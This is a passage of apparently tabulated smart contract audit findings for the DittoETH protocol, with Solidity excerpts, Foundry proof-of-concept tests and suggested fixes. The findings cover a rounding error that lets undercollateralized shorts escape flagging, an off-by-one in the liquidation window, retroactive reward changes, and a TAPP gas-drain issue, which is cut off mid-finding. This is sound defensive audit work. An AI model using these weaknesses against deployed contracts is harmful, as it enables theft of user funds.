This causes potential loss for the DittoETH protocol, among other problems.\\nRoot Cause\\nUse of the following piece of code causes rounding-up:\\nStyle 1\\n```\\nuint256 cRatio = short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset));\\n```\\n\\nStyle 2\\n```\\nuint256 oraclePrice = LibOracle.getOraclePrice(asset); // or uint256 oraclePrice = LibOracle.getSavedOrSpotOraclePrice(asset); // or uint256 oraclePrice = LibOracle.getPrice(asset);\\n // rest of code\\n // rest of code\\n // rest of code\\nuint256 cRatio = short.getCollateralRatioSpotPrice(oraclePrice);\\n```\\n\\n\\nLet's break the issue down into 4 smaller parts:\\nPART 1:\\nLet us first look inside getOraclePrice():\\n```\\n File: contracts/libraries/LibOracle.sol\\n\\n 20 function getOraclePrice(address asset) internal view returns (uint256) {\\n 21 AppStorage storage s = appStorage();\\n 22 AggregatorV3Interface baseOracle = AggregatorV3Interface(s.baseOracle);\\n 23 uint256 protocolPrice = getPrice(asset);\\n 24 // prettier-ignore\\n 25 (\\n 26 uint80 baseRoundID,\\n 27 int256 basePrice,\\n 28 /*uint256 baseStartedAt*/\\n 29 ,\\n 30 uint256 baseTimeStamp,\\n 31 /*uint80 baseAnsweredInRound*/\\n 32 ) = baseOracle.latestRoundData();\\n 33\\n 34 AggregatorV3Interface oracle = AggregatorV3Interface(s.asset[asset].oracle);\\n 35 if (address(oracle) == address(0)) revert Errors.InvalidAsset();\\n 36\\n 37 if (oracle == baseOracle) {\\n 38 //@dev multiply base oracle by 10**10 to give it 18 decimals of precision\\n 39 uint256 basePriceInEth = basePrice > 0\\n 40 ? 
uint256(basePrice * Constants.BASE_ORACLE_DECIMALS).inv()\\n 41 : 0;\\n 42 basePriceInEth = baseOracleCircuitBreaker(\\n 43 protocolPrice, baseRoundID, basePrice, baseTimeStamp, basePriceInEth\\n 44 );\\n 45 return basePriceInEth;\\n 46 } else {\\n 47 // prettier-ignore\\n 48 (\\n 49 uint80 roundID,\\n 50 int256 price,\\n 51 /*uint256 startedAt*/\\n 52 ,\\n 53 uint256 timeStamp,\\n 54 /*uint80 answeredInRound*/\\n 55 ) = oracle.latestRoundData();\\n 56 uint256 priceInEth = uint256(price).div(uint256(basePrice));\\n 57 oracleCircuitBreaker(\\n 58 roundID, baseRoundID, price, basePrice, timeStamp, baseTimeStamp\\n 59 );\\n 60 return priceInEth;\\n 61 }\\n 62 }\\n```\\n\\nBased on whether the `oracle` is `baseOracle` or not, the function returns either `basePriceEth` or `priceInEth`.\\n`basePriceEth` can be `uint256(basePrice * Constants.BASE_ORACLE_DECIMALS).inv()` which is basically `1e36 / (basePrice * Constants.BASE_ORACLE_DECIMALS)` or simply written, of the form `oracleN / oracleD` where `oracleN` is the numerator with value 1e36 (as defined here) and `oracleD` is the denominator.\\n`priceInEth` is given as uint256 `priceInEth` = uint256(price).div(uint256(basePrice)) which again is of the form `oracleN / oracleD`.\\n\\nPART 2:\\ngetSavedOrSpotOraclePrice() too internally calls the above `getOraclePrice()` function, if it has been equal to or more than 15 minutes since the last time `LibOrders.getOffsetTime()` was set:\\n```\\n File: contracts/libraries/LibOracle.sol\\n\\n 153 function getSavedOrSpotOraclePrice(address asset) internal view returns (uint256) {\\n 154 if (LibOrders.getOffsetTime() - getTime(asset) < 15 minutes) {\\n 155 return getPrice(asset);\\n 156 } else {\\n 157 return getOraclePrice(asset);\\n 158 }\\n 159 }\\n```\\n\\n\\nPART 3:\\ngetCollateralRatioSpotPrice() calculates `cRatio` as:\\n```\\n File: contracts/libraries/LibShortRecord.sol\\n\\n 30 function getCollateralRatioSpotPrice(\\n 31 STypes.ShortRecord memory short,\\n 32 uint256 
oraclePrice\\n 33 ) internal pure returns (uint256 cRatio) {\\n 34 return short.collateral.div(short.ercDebt.mul(oraclePrice));\\n 35 }\\n```\\n\\n\\nPART 4 (FINAL PART):\\nThere are multiple places in the code (mentioned below under Impacts section) which compare the user's `cRatio` to `initialCR` or `LibAsset.primaryLiquidationCR(_asset)` in the following manner:\\n```\\nif (short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset)) < LibAsset.primaryLiquidationCR(asset))\\n```\\n\\n\\nCalling `short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset))` means the value returned from it would be:\\n```\\n // @audit-issue : Potential precision loss. Division before multiplication should not be done.\\n shortCollateral / (shortErcDebt * (oracleN / oracleD)) // return short.collateral.div(short.ercDebt.mul(oraclePrice));\\n```\\n\\nwhich has the potential for precision loss (rounding-up) due to division before multiplication. The correct style ought to be:\\n```\\n// Add the line below\\n (shortCollateral * oracleD) / (shortErcDebt * oracleN)\\n```\\n\\n\\nHave attempted to keep all values in close proximity to the ones present in forked mainnet tests.\\nLet's assume some values for numerator & denominator and other variables:\\n```\\n uint256 private short_collateral = 100361729669569000000; // ~ 100 ether\\n uint256 private short_ercDebt = 100000000000000000000000; // 100_000 ether\\n uint256 private price = 99995505; // oracleN\\n uint256 private basePrice = 199270190598; // oracleD\\n uint256 private primaryLiquidationCR = 2000000000000000000; // 2 ether (as on forked mainnet)\\n\\n// For this example, we assume that oracle != baseOracle, so that the below calculation would be done by the protocol\\nSo calculated priceInEth = price.div(basePrice) = 501808648347845 // ~ 0.0005 ether\\n```\\n\\n\\nLet's calculate for the scenario of `flagShort()` where the code logic says:\\n```\\n 53 if (\\n 54 
short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset))\\n 55 >= LibAsset.primaryLiquidationCR(asset) // @audit-issue : this will evaluate to `true`, then revert, due to rounding-up and the short will incorrectly escape flagging\\n 56 ) {\\n 57 revert Errors.SufficientCollateral();\\n 58 }\\n```\\n\\n\\nCreate a file named `test/IncorrectCRatioCheck.t.sol` and paste the following code in it. Some mock functions are included here which mirror protocol's calculation style:\\n```\\n// SPDX-License-Identifier: GPL-3.0-only\\npragma solidity 0.8.21;\\n\\nimport {U256} from ""contracts/libraries/PRBMathHelper.sol"";\\nimport {OBFixture} from ""test/utils/OBFixture.sol"";\\nimport {console} from ""contracts/libraries/console.sol"";\\n\\ncontract IncorrectCRatioCheck is OBFixture {\\n using U256 for uint256;\\n\\n uint256 private short_collateral = 85307470219133700000; // ~ 85.3 ether\\n uint256 private short_ercDebt = 100000000000000000000000; // 100_000 ether\\n uint256 private price = 99995505; // oracleN\\n uint256 private basePrice = 199270190598; // (as on forked mainnet) // oracleD\\n uint256 private primaryLiquidationCR = 1700000000000000000; // 1.7 ether (as on forked mainnet)\\n\\n function _getSavedOrSpotOraclePrice() internal view returns (uint256) {\\n uint256 priceInEth = price.div(basePrice);\\n return priceInEth; // will return 501808648347845 =~ 0.0005 ether // (as on forked mainnet)\\n }\\n\\n function getCollateralRatioSpotPrice_IncorrectStyle_As_In_Existing_DittoProtocol(\\n uint256 oraclePrice\\n ) internal view returns (uint256) {\\n return short_collateral.div(short_ercDebt.mul(oraclePrice));\\n }\\n\\n function getCollateralRatioSpotPrice_CorrectStyle(uint256 oracleN, uint256 oracleD)\\n internal\\n view\\n returns (uint256)\\n {\\n return (short_collateral.mul(oracleD)).div(short_ercDebt.mul(oracleN));\\n }\\n\\n /* solhint-disable no-console */\\n function 
test_GetCollateralRatioSpotPrice_IncorrectStyle_As_In_Existing_DittoProtocol(\\n ) public view {\\n uint256 cRatio =\\n getCollateralRatioSpotPrice_IncorrectStyle_As_In_Existing_DittoProtocol(\\n _getSavedOrSpotOraclePrice()\\n );\\n console.log(""cRatio calculated (existing style) ="", cRatio);\\n if (cRatio >= primaryLiquidationCR) {\\n console.log(""Errors.SufficientCollateral; can not be flagged"");\\n } else {\\n console.log(""InsufficientCollateral; can be flagged"");\\n }\\n }\\n\\n /* solhint-disable no-console */\\n function test_GetCollateralRatioSpotPrice_CorrectStyle() public view {\\n uint256 cRatio = getCollateralRatioSpotPrice_CorrectStyle(price, basePrice);\\n console.log(""cRatio calculated (correct style) ="", cRatio);\\n if (cRatio >= primaryLiquidationCR) {\\n console.log(""Errors.SufficientCollateral; can not be flagged"");\\n } else {\\n console.log(""InsufficientCollateral; can be flagged"");\\n }\\n }\\n}\\n```\\n\\n\\nFirst, let's see the output as per protocol's calculation. Run forge test --mt test_GetCollateralRatioSpotPrice_IncorrectStyle_As_In_Existing_DittoProtocol -vv:\\n```\\nLogs:\\n cRatio calculated (existing style) = 1700000000000000996\\n Errors.SufficientCollateral; can not be flagged\\n```\\n\\nSo the short can not be flagged as `cRatio > primaryLiquidationCR` of 1700000000000000000.\\nNow, let's see the output as per the correct calculation. Run forge test --mt test_GetCollateralRatioSpotPrice_CorrectStyle -vv:\\n```\\nLogs:\\n cRatio calculated (correct style) = 1699999999999899995\\n InsufficientCollateral; can be flagged\\n```\\n\\nShort's cRatio is actually below primaryLiquidationCR. Should have been flagged ideally.\\n","These steps need to be taken to fix the issue. Developer may have to make some additional changes since `.mul`, `.div`, etc are being used from the `PRBMathHelper.sol` library. 
Following is the general workflow required:\\nCreate additional functions to fetch oracle parameters instead of price: Create copies of `getOraclePrice()` and `getSavedOrSpotOraclePrice()`, but these ones return `oracleN` & `oracleD` instead of the calculated price. Let's assume the new names to be `getOraclePriceParams()` and `getSavedOrSpotOraclePriceParams()`.\\nCreate a new function to calculate cRatio which will be used in place of the above occurences of getCollateralRatioSpotPrice():\\n```\\n function getCollateralRatioSpotPriceFromOracleParams(\\n STypes.ShortRecord memory short,\\n uint256 oracleN,\\n uint256 oracleD\\n ) internal pure returns (uint256 cRatio) {\\n return (short.collateral.mul(oracleD)).div(short.ercDebt.mul(oracleN));\\n }\\n```\\n\\n\\nFor fixing the last issue of `oraclePrice.mul(1.01 ether)` on L847, first call `getOraclePriceParams()` to get `oracleN` & `oracleD` and then:\\n```\\n 845 //@dev: force hint to be within 1% of oracleprice\\n 846 bool startingShortWithinOracleRange = shortPrice\\n// Remove the line below\\n 847 <= oraclePrice.mul(1.01 ether)\\n// Add the line below\\n 847 <= (oracleN.mul(1.01 ether)).div(oracleD)\\n 848 && s.shorts[asset][prevId].price >= oraclePrice;\\n```\\n","```\\n File: contracts/facets/YieldFacet.sol\\n\\n 76 function _distributeYield(address asset)\\n 77 private\\n 78 onlyValidAsset(asset)\\n 79 returns (uint88 yield, uint256 dittoYieldShares)\\n 80 {\\n 81 uint256 vault = s.asset[asset].vault;\\n 82 // Last updated zethYieldRate for this vault\\n 83 uint80 zethYieldRate = s.vault[vault].zethYieldRate;\\n 84 // Protocol time\\n 85 uint256 timestamp = LibOrders.getOffsetTimeHours();\\n 86 // Last saved oracle price\\n 87 uint256 oraclePrice = LibOracle.getPrice(asset);\\n 88 // CR of shortRecord collateralized at initialMargin for this asset\\n 89 uint256 initialCR = LibAsset.initialMargin(asset) + 1 ether;\\n 90 // Retrieve first non-HEAD short\\n 91 uint8 id = 
s.shortRecords[asset][msg.sender][Constants.HEAD].nextId;\\n 92 // Loop through all shorter's shorts of this asset\\n 93 while (true) {\\n 94 // One short of one shorter in this market\\n 95 STypes.ShortRecord storage short = s.shortRecords[asset][msg.sender][id];\\n 96 // To prevent flash loans or loans where they want to deposit to claim yield immediately\\n 97 bool isNotRecentlyModified =\\n 98 timestamp - short.updatedAt > Constants.YIELD_DELAY_HOURS;\\n 99 // Check for cancelled short\\n 100 if (short.status != SR.Cancelled && isNotRecentlyModified) {\\n 101 uint88 shortYield =\\n 102 short.collateral.mulU88(zethYieldRate - short.zethYieldRate);\\n 103 // Yield earned by this short\\n 104 yield += shortYield;\\n 105 // Update zethYieldRate for this short\\n 106 short.zethYieldRate = zethYieldRate;\\n 107 // Calculate CR to modify ditto rewards\\n 108 uint256 cRatio = short.getCollateralRatioSpotPrice(oraclePrice);\\n 109 if (cRatio <= initialCR) {\\n 110 dittoYieldShares += shortYield;\\n 111 } else {\\n 112 // Reduce amount of yield credited for ditto rewards proportional to CR\\n 113 dittoYieldShares += shortYield.mul(initialCR).div(cRatio);\\n 114 }\\n 115 }\\n 116 // Move to next short unless this is the last one\\n 117 if (short.nextId > Constants.HEAD) {\\n 118 id = short.nextId;\\n 119 } else {\\n 120 break;\\n 121 }\\n 122 }\\n 123 }\\n```\\n\\nThis rounding-up can lead to user's `cRatio` to be considered as `>initialCR` even when it's slightly lower. 
This results in greater `dittoYieldShares` being calculated.\\n```\\n File: contracts/facets/MarginCallPrimaryFacet.sol\\n\\n 43 function flagShort(address asset, address shorter, uint8 id, uint16 flaggerHint)\\n 44 external\\n 45 isNotFrozen(asset)\\n 46 nonReentrant\\n 47 onlyValidShortRecord(asset, shorter, id)\\n 48 {\\n 49 if (msg.sender == shorter) revert Errors.CannotFlagSelf();\\n 50 STypes.ShortRecord storage short = s.shortRecords[asset][shorter][id];\\n 51 short.updateErcDebt(asset);\\n 52\\n 53 if (\\n 54 short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset))\\n 55 >= LibAsset.primaryLiquidationCR(asset) // @audit-issue : this will evaluate to `true` due to rounding-up and the short will not be eligible for flagging\\n 56 ) {\\n 57 revert Errors.SufficientCollateral();\\n 58 }\\n 59\\n 60 uint256 adjustedTimestamp = LibOrders.getOffsetTimeHours();\\n 61\\n 62 // check if already flagged\\n 63 if (short.flaggerId != 0) {\\n 64 uint256 timeDiff = adjustedTimestamp - short.updatedAt;\\n 65 uint256 resetLiquidationTime = LibAsset.resetLiquidationTime(asset);\\n 66\\n 67 if (timeDiff <= resetLiquidationTime) {\\n 68 revert Errors.MarginCallAlreadyFlagged();\\n 69 }\\n 70 }\\n 71\\n 72 short.setFlagger(cusd, flaggerHint);\\n 73 emit Events.FlagShort(asset, shorter, id, msg.sender, adjustedTimestamp);\\n 74 }\\n```\\n\\n\\n```\\n File: contracts/facets/MarginCallSecondaryFacet.sol\\n\\n 38 function liquidateSecondary(\\n 39 address asset,\\n 40 MTypes.BatchMC[] memory batches,\\n 41 uint88 liquidateAmount,\\n 42 bool isWallet\\n 43 ) external onlyValidAsset(asset) isNotFrozen(asset) nonReentrant {\\n 44 STypes.AssetUser storage AssetUser = s.assetUser[asset][msg.sender];\\n 45 MTypes.MarginCallSecondary memory m;\\n 46 uint256 minimumCR = LibAsset.minimumCR(asset);\\n 47 uint256 oraclePrice = LibOracle.getSavedOrSpotOraclePrice(asset);\\n 48 uint256 secondaryLiquidationCR = LibAsset.secondaryLiquidationCR(asset);\\n 49\\n 50 uint88 
liquidatorCollateral;\\n 51 uint88 liquidateAmountLeft = liquidateAmount;\\n 52 for (uint256 i; i < batches.length;) {\\n 53 m = _setMarginCallStruct(\\n 54 asset, batches[i].shorter, batches[i].shortId, minimumCR, oraclePrice\\n 55 );\\n 56\\n\\n // rest of code// rest of code\\n // rest of code// rest of code\\n // rest of code// rest of code\\n\\n\\n 129 function _setMarginCallStruct(\\n 130 address asset,\\n 131 address shorter,\\n 132 uint8 id,\\n 133 uint256 minimumCR,\\n 134 uint256 oraclePrice\\n 135 ) private returns (MTypes.MarginCallSecondary memory) {\\n 136 LibShortRecord.updateErcDebt(asset, shorter, id);\\n 137\\n 138 MTypes.MarginCallSecondary memory m;\\n 139 m.asset = asset;\\n 140 m.short = s.shortRecords[asset][shorter][id];\\n 141 m.vault = s.asset[asset].vault;\\n 142 m.shorter = shorter;\\n 143 m.minimumCR = minimumCR;\\n 144 m.cRatio = m.short.getCollateralRatioSpotPrice(oraclePrice);\\n 145 return m;\\n 146 }\\n```\\n\\n\\n```\\n File: contracts/facets/ShortRecordFacet.sol\\n\\n 117 function combineShorts(address asset, uint8[] memory ids)\\n 118 external\\n 119 isNotFrozen(asset)\\n 120 nonReentrant\\n 121 onlyValidShortRecord(asset, msg.sender, ids[0])\\n 122 {\\n 123 if (ids.length < 2) revert Errors.InsufficientNumberOfShorts();\\n 124 // First short in the array\\n 125 STypes.ShortRecord storage firstShort = s.shortRecords[asset][msg.sender][ids[0]];\\n \\n // rest of code// rest of code\\n // rest of code// rest of code\\n // rest of code// rest of code\\n\\n 174\\n 175 // Merge all short records into the short at position id[0]\\n 176 firstShort.merge(ercDebt, ercDebtSocialized, collateral, yield, c.shortUpdatedAt);\\n 177\\n 178 // If at least one short was flagged, ensure resulting c-ratio > primaryLiquidationCR\\n 179 if (c.shortFlagExists) {\\n 180 if (\\n 181 firstShort.getCollateralRatioSpotPrice(\\n 182 LibOracle.getSavedOrSpotOraclePrice(_asset)\\n 183 ) < LibAsset.primaryLiquidationCR(_asset)\\n 184 ) revert 
Errors.InsufficientCollateral();\\n 185 // Resulting combined short has sufficient c-ratio to remove flag\\n 186 firstShort.resetFlag();\\n 187 }\\n 188 emit Events.CombineShorts(asset, msg.sender, ids);\\n 189 }\\n```\\n\\n\\nNOTE:\\nWhile the operation done in this piece of code is a bit different from the above analysis, I am clubbing it with this bug report as the underlying issue is the same (and the resolution would be similar): Multiplication and division operations should not be done directly on top of fetched oracle price, without paying attention to new order of evaluation:\\n```\\n File: contracts/libraries/LibOrders.sol\\n\\n 812 function _updateOracleAndStartingShort(address asset, uint16[] memory shortHintArray)\\n 813 private\\n 814 {\\n 815 AppStorage storage s = appStorage();\\n 815 uint256 oraclePrice = LibOracle.getOraclePrice(asset);\\n \\n // rest of code// rest of code\\n // rest of code// rest of code\\n // rest of code// rest of code\\n\\n 845 //@dev: force hint to be within 1% of oracleprice\\n 846 bool startingShortWithinOracleRange = shortPrice\\n 847 <= oraclePrice.mul(1.01 ether) // @audit-issue : division before multiplication\\n 848 && s.shorts[asset][prevId].price >= oraclePrice;\\n \\n // rest of code// rest of code\\n // rest of code// rest of code\\n // rest of code// rest of code\\n\\n 866 }\\n```\\n\\n\\nThe effective calculation being done above is:\\n```\\n (oracleN / oracleD) * (1.01 ether) // division before multiplication\\n```\\n\\n\\nWhich should have been:\\n```\\n (oracleN * 1.01 ether) / oracle\\n```\\n\\n\\nSimilar multiplication or division operations have been done on `price` at various places throughout the code, which can be clubbed under this root cause itself.",```\\nuint256 cRatio = short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset));\\n```\\n +Primary short liquidation can not be completed in the last hour of the liquidation timeline,medium,"Shorts flagged for liquidation can not be 
liquidated in the last and final hour of the liquidation timeline, resulting in the liquidation flag being reset and requiring the short to be flagged again.\\nIf a short's collateral ratio is below the primary liquidation threshold (determined by the `LibAsset.primaryLiquidationCR` function, by default set to 400%), anyone can flag the position for liquidation by calling the `MarginCallPrimaryFacet.flagShort` function.\\nSubsequently, the short position owner has a certain amount of time, specifically, `10 hours` (configured and determined by the `LibAsset.firstLiquidationTime` function), to repay the loan and bring the collateral ratio back above the primary liquidation threshold. If the short position owner fails to do so, the short position can be liquidated by calling the `MarginCallPrimaryFacet.liquidate` function.\\nThe specific criteria for the liquidation eligibility are defined and determined in the `MarginCallPrimaryFacet._canLiquidate` function.\\ncontracts/facets/MarginCallPrimaryFacet.sol#L387\\n```\\nfunction _canLiquidate(MTypes.MarginCallPrimary memory m)\\n private\\n view\\n returns (bool)\\n{\\n// rest of code // [// rest of code]\\n uint256 timeDiff = LibOrders.getOffsetTimeHours() - m.short.updatedAt;\\n uint256 resetLiquidationTime = LibAsset.resetLiquidationTime(m.asset);\\n❌ if (timeDiff >= resetLiquidationTime) {\\n return false;\\n } else {\\n uint256 secondLiquidationTime = LibAsset.secondLiquidationTime(m.asset);\\n bool isBetweenFirstAndSecondLiquidationTime = timeDiff\\n > LibAsset.firstLiquidationTime(m.asset) && timeDiff <= secondLiquidationTime\\n && s.flagMapping[m.short.flaggerId] == msg.sender;\\n bool isBetweenSecondAndResetLiquidationTime =\\n timeDiff > secondLiquidationTime && timeDiff <= resetLiquidationTime;\\n if (\\n !(\\n (isBetweenFirstAndSecondLiquidationTime)\\n || (isBetweenSecondAndResetLiquidationTime)\\n )\\n ) {\\n revert Errors.MarginCallIneligibleWindow();\\n }\\n return true;\\n }\\n}\\n```\\n\\nThis function 
checks in lines 387-389 if the elapsed time (timeDiff) since the short was updated is equal or greater than the reset liquidation time (resetLiquidationTime), which is by default set to `16 hours`. In this case, the short position has not been liquidated in time and has to be flagged again.\\nHowever, this condition conflicts with the `isBetweenSecondAndResetLiquidationTime` criteria in lines 394-395, specifically, the `timeDiff` <= `resetLiquidationTime` check. If the `timeDiff` value is equal to `resetLiquidationTime`, both conditions, in line 387 as well as the check in line 395, are `true`. Due to line 387 taking precedence, the liquidation is considered outdated and the short position has to be flagged again.\\nBased on the check in lines 67-69 of the `flagShort` function, it is evident that a short position flagged for liquidation requires re-flagging only if the `timeDiff` value is greater (>) than the reset liquidation time (resetLiquidationTime):\\ncontracts/facets/MarginCallPrimaryFacet.sol#L67-L69\\n```\\nif (timeDiff <= resetLiquidationTime) {\\n revert Errors.MarginCallAlreadyFlagged();\\n}\\n```\\n\\nThus, the check in line 387 is incorrect, leading to prematurely resetting the short's liquidation flagging status.\\nAs the timestamps are in `hours`, and the liquidation timeline is relatively short, having an off-by-one error in the liquidation timeline can lead to a significant impact on the liquidations. 
Concretely, attempting to liquidate a short position in the last hour of the timeline, i.e., `timeDiff = 16`, is not possible.",Consider using `>` instead of `>=` in line 387 to prevent the liquidation timeline from overlapping with the bounds check in line 395.,,```\\nfunction _canLiquidate(MTypes.MarginCallPrimary memory m)\\n private\\n view\\n returns (bool)\\n{\\n// rest of code // [// rest of code]\\n uint256 timeDiff = LibOrders.getOffsetTimeHours() - m.short.updatedAt;\\n uint256 resetLiquidationTime = LibAsset.resetLiquidationTime(m.asset);\\n❌ if (timeDiff >= resetLiquidationTime) {\\n return false;\\n } else {\\n uint256 secondLiquidationTime = LibAsset.secondLiquidationTime(m.asset);\\n bool isBetweenFirstAndSecondLiquidationTime = timeDiff\\n > LibAsset.firstLiquidationTime(m.asset) && timeDiff <= secondLiquidationTime\\n && s.flagMapping[m.short.flaggerId] == msg.sender;\\n bool isBetweenSecondAndResetLiquidationTime =\\n timeDiff > secondLiquidationTime && timeDiff <= resetLiquidationTime;\\n if (\\n !(\\n (isBetweenFirstAndSecondLiquidationTime)\\n || (isBetweenSecondAndResetLiquidationTime)\\n )\\n ) {\\n revert Errors.MarginCallIneligibleWindow();\\n }\\n return true;\\n }\\n}\\n```\\n +Changes in `dittoShorterRate` affect retroactively to accrued Ditto yield shares,low,"The calculation of the Ditto rewards earned by shorters does not take into account that the changes in the Ditto shorter rate will impact retroactively, inflating or deflating the new Ditto rewards of the users.\\n`YieldFacet.sol:distributeYield()` calculates and credits ZETH and Ditto rewards earned from short records by `msg.sender`. 
The distribution of the rewards is performed in the `_claimYield()` function:\\n```\\n125 // Credit ZETH and Ditto rewards earned from shortRecords from all markets\\n126 function _claimYield(uint256 vault, uint88 yield, uint256 dittoYieldShares) private {\\n127 STypes.Vault storage Vault = s.vault[vault];\\n128 STypes.VaultUser storage VaultUser = s.vaultUser[vault][msg.sender];\\n129 // Implicitly checks for a valid vault\\n130 if (yield <= 1) revert Errors.NoYield();\\n131 // Credit yield to ethEscrowed\\n132 VaultUser.ethEscrowed += yield;\\n133 // Ditto rewards earned for all shorters since inception\\n134 uint256 protocolTime = LibOrders.getOffsetTime();\\n135 uint256 dittoRewardShortersTotal = Vault.dittoShorterRate * protocolTime;\\n136 // Ditto reward proportion from this yield distribution\\n137 uint256 dittoYieldSharesTotal = Vault.zethCollateralReward;\\n138 uint256 dittoReward =\\n139 dittoYieldShares.mul(dittoRewardShortersTotal).div(dittoYieldSharesTotal);\\n140 // Credit ditto reward to user\\n141 if (dittoReward > type(uint80).max) revert Errors.InvalidAmount();\\n142 VaultUser.dittoReward += uint80(dittoReward);\\n143 }\\n```\\n\\nFocusing on the Ditto rewards, we can see that the function receives the number of yield shares earned by the user (dittoYieldShares) and in line 138 calculates the Ditto reward by multiplying this amount by the total amount of rewards of the protocol (dittoRewardShortersTotal) and dividing it by the total amount of yield shares of the protocol (dittoYieldSharesTotal).\\nIf we take a look in line 135 at how the `dittoRewardShortersTotal` is calculated, we can see that it is the product of the Ditto shorter rate and total time elapsed since the protocol deployment.\\nThis last calculation is wrong, as it is assumed that the Ditto shorter rate is constant, but this parameter can be changed by the admin or the DAO. 
This means that the changes in the Ditto shorter rate will impact retroactively, inflating or deflating the new Ditto rewards of the users. Also, users that have yielded the same number of shares during the same period, will receive different rewards depending on whether they claim their rewards before or after the Ditto shorter rate change.\\nAdd the following code snippet into `test/Yield.t.sol` and run `forge test --mt testYieldRateChange`.\\n```\\n function testYieldRateChange() public {\\n address alice = makeAddr(""alice"");\\n address bob = makeAddr(""bob"");\\n address[] memory assets = new address[](1);\\n assets[0] = asset;\\n\\n fundLimitBid(DEFAULT_PRICE, 320000 ether, receiver);\\n fundLimitShort(DEFAULT_PRICE, 80000 ether, alice);\\n fundLimitShort(DEFAULT_PRICE, 80000 ether, bob);\\n generateYield();\\n skip(yieldEligibleTime);\\n\\n // Alice and Bob have the same number of Ditto yield shares\\n assertEq(diamond.getDittoMatchedReward(vault, alice), diamond.getDittoMatchedReward(vault, alice));\\n\\n // Alice's yield is distributed\\n vm.prank(alice);\\n diamond.distributeYield(assets);\\n\\n // Ditto shorter rate is updated\\n vm.prank(owner);\\n diamond.setDittoShorterRate(vault, 2);\\n\\n // Bob's yield is distributed\\n vm.prank(bob);\\n diamond.distributeYield(assets);\\n\\n uint256 aliceDittoRewards = diamond.getDittoReward(vault, alice);\\n uint256 bobDittoRewards = diamond.getDittoReward(vault, bob);\\n\\n // Bob receives more Ditto rewards than Alice, even both were entitled to the same amount\\n assertApproxEqAbs(aliceDittoRewards * 2, bobDittoRewards, 2);\\n }\\n```\\n",Create two new state variables that keep track of the timestamp of the last Ditto shorter rate update and the total Ditto rewards accrued at that time. 
Then the calculation of `dittoRewardShortersTotal` would be:\\n```\\n uint256 dittoRewardShortersTotal = lastSnapshotRewards + Vault.dittoShorterRate * (protocolTime - lastSnapshotTimestamp);\\n```\\n,"Changes in the Ditto shorter rate will impact retroactively, inflating or deflating the new Ditto rewards of the users. Users might not be incentivized to claim their rewards, as they might receive more rewards if they wait for the Ditto shorter rate to change.","```\\n125 // Credit ZETH and Ditto rewards earned from shortRecords from all markets\\n126 function _claimYield(uint256 vault, uint88 yield, uint256 dittoYieldShares) private {\\n127 STypes.Vault storage Vault = s.vault[vault];\\n128 STypes.VaultUser storage VaultUser = s.vaultUser[vault][msg.sender];\\n129 // Implicitly checks for a valid vault\\n130 if (yield <= 1) revert Errors.NoYield();\\n131 // Credit yield to ethEscrowed\\n132 VaultUser.ethEscrowed += yield;\\n133 // Ditto rewards earned for all shorters since inception\\n134 uint256 protocolTime = LibOrders.getOffsetTime();\\n135 uint256 dittoRewardShortersTotal = Vault.dittoShorterRate * protocolTime;\\n136 // Ditto reward proportion from this yield distribution\\n137 uint256 dittoYieldSharesTotal = Vault.zethCollateralReward;\\n138 uint256 dittoReward =\\n139 dittoYieldShares.mul(dittoRewardShortersTotal).div(dittoYieldSharesTotal);\\n140 // Credit ditto reward to user\\n141 if (dittoReward > type(uint80).max) revert Errors.InvalidAmount();\\n142 VaultUser.dittoReward += uint80(dittoReward);\\n143 }\\n```\\n" +Margin callers can drain the TAPP during liquidation by willingly increase gas costs with the shortHintArray,high,"During primary liquidation the TAPP (Treasury Asset Protection Pool) pays the gas costs of force bids, so that margin callers are even motivated to liquidate shorters, if gas costs are high. To liquidate a shortRecord margin, callers must provide a parameter called shortHintArray to the function call. 
The purpose of this array is to save gas, it should contain id hints where the protocol should look for shorts in the order book which are currently above the oracle price, since users can't match against shorts under the oracle price. As the protocol loops through this shortHintArray, an array with wrong hints could increase gas and as the length of the array is never checked, it could even increase the gas costs to an amount that would fully drain the TAPP. As the TAPP is an important security mechanism of the protocol, draining the funds of it could lead to a shutdown of the market and therefore to a big loss of user funds.\\nThe liquidate function takes the shortHintArray as parameter:\\n```\\nfunction liquidate(\\n address asset,\\n address shorter,\\n uint8 id,\\n uint16[] memory shortHintArray\\n)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, shorter, id)\\n returns (uint88, uint88)\\n{\\n// rest of code\\n}\\n```\\n\\nThis array is then used to create a forceBid:\\n```\\n(m.ethFilled, ercAmountLeft) = IDiamond(payable(address(this))).createForcedBid(\\n address(this), m.asset, _bidPrice, m.short.ercDebt, shortHintArray\\n);\\n```\\n\\nAnd during these process, the protocol loops over this array:\\n```\\nfunction _updateOracleAndStartingShort(address asset, uint16[] memory shortHintArray)\\n private\\n{\\n // rest of code\\n uint16 shortHintId;\\n for (uint256 i = 0; i < shortHintArray.length;) {\\n shortHintId = shortHintArray[i];\\n unchecked {\\n ++i;\\n }\\n\\n {\\n O shortOrderType = s.shorts[asset][shortHintId].orderType;\\n if (\\n shortOrderType == O.Cancelled || shortOrderType == O.Matched\\n || shortOrderType == O.Uninitialized\\n ) {\\n continue;\\n }\\n }\\n // rest of code\\n}\\n```\\n\\nIn the end, the TAPP pays for the gas costs in the _marginFeeHandler function:\\n```\\nfunction _marginFeeHandler(MTypes.MarginCallPrimary memory m) private {\\n STypes.VaultUser storage VaultUser = 
